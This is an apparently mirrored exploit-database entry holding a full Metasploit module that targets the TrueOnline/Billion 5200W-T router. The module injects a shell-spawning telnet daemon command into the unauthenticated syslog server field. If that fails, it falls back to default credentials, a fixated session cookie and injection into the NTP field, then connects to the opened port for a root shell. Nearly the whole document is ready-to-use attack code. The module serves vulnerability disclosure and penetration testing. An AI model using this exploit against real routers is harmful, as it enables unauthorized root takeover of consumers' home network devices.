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TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection

🗓️ 01 Feb 2017 00:00:00Reported by Pedro RibeiroType 
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TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection vulnerability on Thai ISP's customized route

Code
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection',  
'Description' => %q{  
TrueOnline is a major ISP in Thailand, and it distributes a customised version of  
the Billion 5200W-T router. This customised version has at least two command injection  
vulnerabilities, one authenticated and one unauthenticated, on different firmware versions.  
This module will attempt to exploit the unauthenticated injection first, and if that fails,  
it will attempt to exploit the authenticated injection.  
This module was tested in an emulated environment, as the author doesn't have access to the  
Thai router any more. Any feedback should be sent directly to the module's author, as well as  
to the Metasploit project.  
There are other language strings in the firmware, so it is likely that this firmware is not  
only distributed in Thailand. Other Billion 5200W-T in other countries might be vulnerable too.  
},  
'Author' =>  
[  
'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module  
],  
'License' => MSF_LICENSE,  
'Platform' => 'unix',  
'References' =>  
[  
['URL', 'http://seclists.org/fulldisclosure/2017/Jan/40'],  
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt'],  
['URL', 'https://blogs.securiteam.com/index.php/archives/2910']  
],  
'Targets' =>  
[  
[ 'Billion 5200W-T', {}],  
],  
'Privileged' => true,  
'Arch' => ARCH_CMD,  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  
'DisclosureDate' => 'Dec 26 2016',  
'DefaultTarget' => 0))  
register_options(  
[  
Opt::RPORT(80),  
OptInt.new('TelnetPort', [true, "Telnet port we're going to use", 9090]),  
OptString.new('HttpUsername', [true, 'Username for the web interface (using default credentials)', 'admin']),  
OptString.new('HttpPassword', [true, 'Password for the web interface (using default credentials)', 'password']),  
], self.class)  
end  
  
# no reliable way to check if this router is vulnerable  
  
def exploit  
command = "utelnetd -l /bin/sh -p #{datastore['TelnetPort']} -d"  
  
print_status("#{peer} - Attempting to exploit unauthenticated injection")  
res = send_request_cgi({  
'uri' => '/cgi-bin/adv_remotelog.asp',  
'method' => 'POST',  
'vars_post' => {  
'RemotelogEnable' => '1',  
'syslogServerAddr' => "1.1.1.1;#{command};#",  
'serverPort' => '514'  
}  
})  
  
if res && res.code == 404  
print_error("#{peer} - Well that failed, trying the authenticated one...")  
  
cookie = "SESSIONID=#{rand_text_alpha_lower(8)}"  
  
# "fixate" the cookie we want - just send a GET request first, we will get a 403 but on the next  
# request the router will accept our cookie as valid  
send_request_raw({  
'uri' => '/',  
'method' => 'GET',  
'headers' => { 'Cookie' => cookie }  
})  
  
sleep 2  
  
body = "SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer=\"%3b#{command.gsub(" ", "+")}%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA"  
  
# send_request_raw will send the HttpUsername and HttpPassword automatically if it finds a challenge  
send_request_raw({  
'uri' => '/cgi-bin/tools_time.asp',  
'method' => 'POST',  
'headers' => {  
'Content-Type' => 'application/x-www-form-urlencoded',  
'Cookie' => cookie  
},  
'data' => body  
})  
  
sleep 3  
end  
  
begin  
ctx = { 'Msf' => framework, 'MsfExploit' => self }  
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['TelnetPort'], 'Context' => ctx, 'Timeout' => 10 })  
if not sock.nil?  
print_good("#{peer} - Success, shell incoming!")  
return handler(sock)  
end  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
sock.close if sock  
end  
  
fail_with(Failure::Unknown, "#{peer} - Failed to exploit router.")  
end  
end  
`

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